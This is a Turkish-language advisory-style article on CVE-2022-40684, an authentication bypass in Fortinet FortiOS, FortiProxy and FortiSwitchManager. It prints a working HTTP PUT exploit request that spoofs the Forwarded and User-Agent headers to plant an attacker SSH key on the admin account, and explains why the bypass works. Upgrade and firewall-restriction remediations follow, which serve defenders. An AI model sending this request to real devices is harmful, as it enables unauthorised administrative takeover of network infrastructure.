Güvenlik Açığı Hakkında

CVE-2022-40684, FortiOS, Fortiproxy ve FortiSwitchManager gibi bazı Fortinet ürünlerinde bulunan bir kimlik doğrulama atlama güvenlik açığıdır. Bu, saldırganın bu güvenlik açığını kullanarak kimlik doğrulamayı atlayabileceği ve yönetici olarak oturum açabileceği anlamına gelir. Bu güvenlik açığı için taban puan 9,8'dir ve bu onu son derece kritik hale getirir. Daha fazla ilerlemeden önce bu ürünlerin neler olduğunu anlayalım:

1. FortiOS: Adından da anlaşılacağı gibi Fortinet Network İşletim Sistemi FortiOS , Fortinet Security'nin kalbidir. Bu işletim sistemi, Security Fabric'in merkezinde yer alır ve bir kuruluşun tüm dağıtımında sıkı bir entegrasyon sağlamak için tüm bileşenleri birbirine bağlar.
2. FortiProxy: Web filtreleme gibi çoklu tespit tekniklerini bünyesinde barındırarak çalışanları internet kaynaklı saldırılara karşı koruyan güvenli bir web proxy'sidir.
3. FortiSwitchManager (FSWM), FortiSwitch ürünü için şirket içi yönetim platformudur . FortiSwitch birimleri, katman-3 ağı üzerinden FortiSwitch Manager'a bağlanır. Yalnızca FortiSwitch yönetimine yönelik bu platformla çok sayıda FortiSwitch birimini yapılandırabilirsiniz.

Darbe

Hata, kimliği doğrulanmamış bir kullanıcının bazı HTTP/S istekleri aracılığıyla doğrudan yönetici panelinde işlem yapmasına izin verecektir (yöntemler GET, POST, DELETE vb. olabilir). Yönetici rolüne sahip olmak, aşağıdaki olaylardan bazılarına neden olabilir:

1. Kontrol tüm uygulamayı devralır
2. Dahili altyapıya erişim elde etme
3. Kullanıcıların eklenmesi veya silinmesi
4. Hassas verilere maruz kalma
5. Saldırganın güvenliği ihlal edilmiş sistemde oturum açmasını sağlamak için yönetici kullanıcıların SSH anahtarlarını değiştirin
6. Farklı yapılandırma dosyalarıyla kurcalama vb.

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 Ana Bilgisayar: 10.0.40.67 Kullanıcı Aracısı: Rapor Çalıştırıcı İçerik Türü: application/json İletilen: for=”[127.0.0.1]:8000″;by= ”[127.0.0.1]:9000 ″; Content-Length: 612 { “ssh-public-key1”: “\”ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOC0lL4quBWMUAM9g/g9TSutzDupGQOnlYqfaNEIZqnSLJ3Mfln6rGSYol/WSm6/N7TNpuVFScRtmdUZ9O8oSamyaizqMG5hcRKRiI49F49judolcffBCTaVpQpxqt+tjcuGzZAoIqg6TyHg1BNoja/IjUQIVbNGyzl+DxmsX3mbmIwmffoyV8l4sEOynYqP3TC2Z8wJWv3WGudHMEDXBiyN3lrIDKlHzROWBkGQOcv3dCoYFTkzdKYPMtnTNdGOOF6wgWB3Y/fHyyWvbN23N2mxsgbRMdKTItJJNLGiJwYBHnC3lp2CQQlrYfsAnBQRu56gp7TPgheP+UYyGlYy4mcnsanGYCS4VozGfWwvhTSGEP5Uws/WxWNFq3Be7c/IWPx5AzvzT3iOq9R704xL1BxW9KAkPmjegav/jOEEh5YX7b+HcErMpTfo5DCi0CZilBUn9q/qM3v4HWKgJObaJnycE/PPyZML0xof29qvbXJDy2efYeCUCfxAIHUcJx58=dev@devs-MacBook-Pro.local \”” }

• Saldırgan, Yönlendirilen başlığı kullanarak client_ip'yi "127.0.0.1" olarak ayarlayabilir .
• "Güvenilir erişim" kimlik denetimi, client_ip'in " 127.0.0.1" ve User-Agent'ın "Rapor Çalıştırıcı" olduğunu doğrular ve her ikisi de saldırganın kontrolü altındadır.

“Çare bulmak, hata bulmaktan çok daha önemlidir”

Aşağıda, bir kuruluşu CVE-2022–40684'ten korumaya yönelik düzeltmelerden bazıları verilmiştir:

1. Etkilenen ürünlerin üst derecelendirmesi.
   FortiOS sürümünü ≥7.2.2 ve ≥7.0.7'ye yükseltin
   FortiProxy sürümünü ≥7.2.1 ve ≥ 7.0.7'ye
   yükseltin FortiSwitchManager sürümünü ≥7.2.1 ve ≥7.0.1'e yükseltin
2. FortiOS, FortiProxy ve FortiSwitchManager'da http/https yönetim arayüzünü devre dışı bırakın.
3. FortiOS için, yönetici arayüzüne erişebilen IP adreslerini sınırlayın

config firewall address
edit "my_allowed_addresses"
set subnet <MY IP> <MY SUBNET>
end

config firewall addrgrp
edit "MGMT_IPs"
set member "my_allowed_addresses"
end

config firewall local-in-policy
edit 1
set intf port1
set srcaddr "MGMT_IPs"
set dstaddr "all"
set action accept
set service HTTPS HTTP
set schedule "always"
set status enable
next
edit 2
set intf "any"
set srcaddr "all"
set dstaddr "all"
set action deny
set service HTTPS HTTP
set schedule "always"
set status enable
end

config firewall service custom
edit GUI_HTTPS
set tcp-portrange <admin-sport>
next
edit GUI_HTTP
set tcp-portrange <admin-port>
end

config system interface
edit port1
set dedicated-to management
set trust-ip-1 <MY IP> <MY SUBNET>
end